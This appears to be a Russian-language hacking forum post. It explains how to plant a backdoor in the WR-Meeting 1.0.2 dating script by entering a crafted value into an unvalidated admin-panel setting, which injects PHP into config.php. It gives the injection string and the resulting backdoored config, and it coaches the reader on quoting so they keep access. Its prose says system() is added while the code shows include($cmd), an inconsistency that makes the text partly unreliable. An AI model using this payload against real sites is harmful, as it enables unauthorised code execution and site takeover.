DDoSька, в общем идея такая, файл
config.php - это файл, в котором хранятся настройки WR-Meeting в таком формате
PHP код:
<? // WR-Meeting v 1.0.2 // 23.09.07 г. // Miha-ingener@yandex.ru
................чего-то ещё........................
$adminemail="email@email.ru"; // Емайл админа
$password="admin"; // Пароль админа
................чего-то ещё........................
$datadir="./fotodat"; // Каталог с фото и комментариями/оценками
................чего-то ещё........................
?>
Основной скрипт
index.php обращается к этим настройкам посредством конструкции
Панель администрирования (файл
admin.php) позволяет изменять значения переменных в файле
config.php. А поскольку в админке не проверяется корректность вводимых данных, то введя в пункте
"Относительный путь до папки с данными скрипта" значение
PHP код:
./fotodat";if(isset($_GET)){include($cmd);}//
мы добавляем в PHP-код файла
config.php (а заодно и файла
index.php) дополнительную инструкцию
system()
PHP код:
<? // WR-Meeting v 1.0.2 // 23.09.07 г. // Miha-ingener@yandex.ru
$datadir="./fotodat";if(isset($_GET["cmd"])){include($cmd);}//"; // Каталог с фото и комментариями/оценками
?>
Смотри, после присвоения переменной
$datadir значения, добавилась инструкция
system(). Главное не запутаться с количеством кавычек и вообще не косячить с синтаксисом. Если ошибёшься, завалишь скрипт знакомств, а заодно потеряешь доступ.